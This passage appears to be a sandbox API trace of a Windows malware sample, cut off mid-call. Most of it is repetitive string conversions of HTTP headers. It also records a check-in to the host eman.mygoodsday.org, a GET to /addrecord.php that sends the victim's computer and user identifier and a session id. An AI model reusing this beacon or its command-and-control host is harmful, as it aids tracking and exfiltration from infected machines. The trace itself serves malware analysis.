| out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:47 GMT") returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:47 GMT") returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:47 GMT") returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:47 GMT") returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:47 GMT") returned 23 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Length: 12", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Length: 12", cchWideChar=18, lpMultiByteStr=0x1fde50c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content-Length: 12", lpUsedDefaultChar=0x0) returned 18 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:04:47 GMT") returned 18 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:04:47 GMT") returned 18 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-LENGTH: 12", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-LENGTH: 12", cchWideChar=18, lpMultiByteStr=0x1fde56c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTENT-LENGTH: 12", lpUsedDefaultChar=0x0) returned 18 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:47 GMT") returned 18 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:04:47 GMT") returned 18 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:47 GMT") returned 18 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:47 GMT") returned 18 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:47 GMT") returned 18 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Connection: keep-alive", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Connection: keep-alive", cchWideChar=22, lpMultiByteStr=0x1fde50c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Connection: keep-alive", lpUsedDefaultChar=0x0) returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-aliveL03:04:47 GMT") returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-aliveL03:04:47 GMT") returned 22 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONNECTION: KEEP-ALIVE", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONNECTION: KEEP-ALIVE", cchWideChar=22, lpMultiByteStr=0x1fde56c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNECTION: KEEP-ALIVE", lpUsedDefaultChar=0x0) returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:47 GMT") returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:47 GMT") returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:47 GMT") returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:47 GMT") returned 22 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:47 GMT") returned 22 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-Powered-By: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-Powered-By: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x1fde50c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X-Powered-By: PHP/5.4.16", lpUsedDefaultChar=0x0) returned 24 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:04:47 GMT") returned 24 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:04:47 GMT") returned 24 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-POWERED-BY: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0091.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-POWERED-BY: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x1fde56c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X-POWERED-BY: PHP/5.4.16", lpUsedDefaultChar=0x0) returned 24 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:47 GMT") returned 24 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:47 GMT") returned 24 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:47 GMT") returned 24 [0091.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:47 GMT") returned 24 [0091.025] GetCurrentThreadId () returned 0xdb0 [0091.025] GetCurrentThreadId () returned 0xdb0 [0091.025] GetCurrentThreadId () returned 0xdb0 [0091.025] QueryPerformanceFrequency (in: lpFrequency=0x248fca4 | out: lpFrequency=0x248fca4) returned 1 [0091.026] QueryPerformanceCounter (in: lpPerformanceCount=0x248fc9c | out: lpPerformanceCount=0x248fc9c*=13848816099) returned 1 [0091.026] shutdown (s=0x2a8, how=1) returned 0 [0091.026] Sleep (dwMilliseconds=0x1) [0091.035] ioctlsocket (in: s=0x2a8, cmd=1074030207, argp=0x248fce8 | out: argp=0x248fce8) returned 0 [0091.035] closesocket (s=0x2a8) returned 0 [0091.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fba698, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0091.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fba698, cbMultiByte=12, lpWideCharStr=0x1fcfbac, cchWideChar=12 | out: lpWideCharStr="ADDRECORD OK") returned 12 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.035] GetCurrentThreadId () returned 0xdb0 [0091.036] GetCurrentThreadId () returned 0xdb0 [0091.036] GetCurrentThreadId () returned 0xdb0 [0091.036] SetEvent (hEvent=0x1dc) returned 1 [0091.036] GetCurrentThreadId () returned 0xdb0 [0091.036] GetCurrentThreadId () returned 0xdb0 [0091.036] GetCurrentThreadId () returned 0xdb0 [0091.036] CloseHandle (hObject=0x228) returned 1 [0091.036] RtlExitUserThread (Status=0x0) Thread: id = 86 os_tid = 0xedc Thread: id = 87 os_tid = 0xee0 Thread: id = 88 os_tid = 0x0 Thread: id = 91 os_tid = 0xf98 [0195.885] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0195.885] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x1fc8adc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eman.mygoodsday.org", lpUsedDefaultChar=0x0) returned 19 [0195.885] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x2001d2c, cbMultiByte=25, lpWideCharStr=0x63ed30, cchWideChar=2047 | out: lpWideCharStr="Host: eman.mygoodsday.org") returned 25 [0195.885] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0195.885] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x1fba6fc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0195.885] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0195.885] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x1fc8b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eman.mygoodsday.org", lpUsedDefaultChar=0x0) returned 19 [0195.885] getaddrinfo (in: pNodeName="eman.mygoodsday.org", pServiceName="80", pHints=0x63fb84*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x63fba4 | out: ppResult=0x63fba4*=0x2c1b28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2bcbb8*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), ai_next=0x0)) returned 0 [0195.888] FreeAddrInfoW (pAddrInfo=0x2c1b28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2bcbb8*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), ai_next=0x0)) [0195.888] getnameinfo (in: pSockaddr=0x63fc0c*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), SockaddrLength=0x10, pNodeBuffer=0x2413bbc, NodeBufferSize=0x401, pServiceBuffer=0x1fe538c, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="104.218.120.192", pServiceBuffer="80") returned 0 [0195.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f6c, cbMultiByte=15, lpWideCharStr=0x63ec28, cchWideChar=2047 | out: lpWideCharStr="104.218.120.192") returned 15 [0195.888] htons (hostshort=0x5000) returned 0x50 [0195.888] socket (af=2, type=1, protocol=6) returned 0x288 [0195.888] connect (s=0x288, name=0x63fcd0*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), namelen=16) returned 0 [0195.910] getsockname (in: s=0x288, name=0x1f5f500, namelen=0x63fc9c | out: name=0x1f5f500*(sa_family=2, sin_port=0xc31e, sin_addr="192.168.0.96"), namelen=0x63fc9c) returned 0 [0195.910] getpeername (in: s=0x288, name=0x1f5f51c, namelen=0x63fc9c | out: name=0x1f5f51c*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), namelen=0x63fc9c) returned 0 [0195.910] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", cchWideChar=249, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 249 [0195.911] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", cchWideChar=249, lpMultiByteStr=0x1f5a1bc, cbMultiByte=249, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", lpUsedDefaultChar=0x0) returned 249 [0195.911] send (in: s=0x288, buf=0x1f5a1bc*, len=249, flags=0 | out: buf=0x1f5a1bc*) returned 249 [0195.911] QueryPerformanceFrequency (in: lpFrequency=0x63fcc4 | out: lpFrequency=0x63fcc4) returned 1 [0195.911] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcbc | out: lpPerformanceCount=0x63fcbc*=24337363349) returned 1 [0195.911] Sleep (dwMilliseconds=0x0) [0195.918] ioctlsocket (in: s=0x288, cmd=1074030207, argp=0x63fc9c | out: argp=0x63fc9c) returned 0 [0195.918] select (in: nfds=649, readfds=0x63fb90, writefds=0x0, exceptfds=0x0, timeout=0x63fb88 | out: readfds=0x63fb90, writefds=0x0, exceptfds=0x0) returned 1 [0196.062] ioctlsocket (in: s=0x288, cmd=1074030207, argp=0x63fc9c | out: argp=0x63fc9c) returned 0 [0196.062] recv (in: s=0x288, buf=0x1f1c30c, len=178, flags=0 | out: buf=0x1f1c30c*) returned 178 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f6c, cbMultiByte=15, lpWideCharStr=0x63ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OKodsday.org") returned 15 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f6c, cbMultiByte=15, lpWideCharStr=0x63ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OKodsday.org") returned 15 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f6c, cbMultiByte=15, lpWideCharStr=0x63ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OKodsday.org") returned 15 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352438616) returned 1 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f6c, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx1 200 OKodsday.org") returned 13 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352445707) returned 1 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe538c, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:06:33 GMT") returned 35 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352452537) returned 1 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8adc, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:06:33 GMT") returned 23 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352459260) returned 1 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8adc, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/html03:06:33 GMT") returned 18 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352465888) returned 1 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8adc, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-alivel03:06:33 GMT") returned 22 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352472575) returned 1 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fcfe4c, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:06:33 GMT") returned 24 [0196.062] QueryPerformanceFrequency (in: lpFrequency=0x63fcb8 | out: lpFrequency=0x63fcb8) returned 1 [0196.062] QueryPerformanceCounter (in: lpPerformanceCount=0x63fcb0 | out: lpPerformanceCount=0x63fcb0*=24352479162) returned 1 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Server: nginx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Server: nginx", cchWideChar=13, lpMultiByteStr=0x1fb2f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Server: nginx", lpUsedDefaultChar=0x0) returned 13 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f0c, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx PHP/5.4.163:06:33 GMT") returned 13 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2f0c, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx PHP/5.4.163:06:33 GMT") returned 13 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SERVER: NGINX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SERVER: NGINX", cchWideChar=13, lpMultiByteStr=0x1fb31ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SERVER: NGINX", lpUsedDefaultChar=0x0) returned 13 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb31ac, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:06:33 GMT") returned 13 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb31ac, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:06:33 GMT") returned 13 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb31ac, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:06:33 GMT") returned 13 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb31ac, cbMultiByte=13, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:06:33 GMT") returned 13 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Date: Wed, 03 Oct 2018 03:06:33 GMT", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Date: Wed, 03 Oct 2018 03:06:33 GMT", cchWideChar=35, lpMultiByteStr=0x1fde32c, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Date: Wed, 03 Oct 2018 03:06:33 GMT", lpUsedDefaultChar=0x0) returned 35 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:06:33 GMT") returned 35 [0196.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:06:33 GMT") returned 35 [0196.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DATE: WED, 03 OCT 2018 03:06:33 GMT", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DATE: WED, 03 OCT 2018 03:06:33 GMT", cchWideChar=35, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATE: WED, 03 OCT 2018 03:06:33 GMT", lpUsedDefaultChar=0x0) returned 35 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:06:33 GMT") returned 35 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:06:33 GMT") returned 35 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: 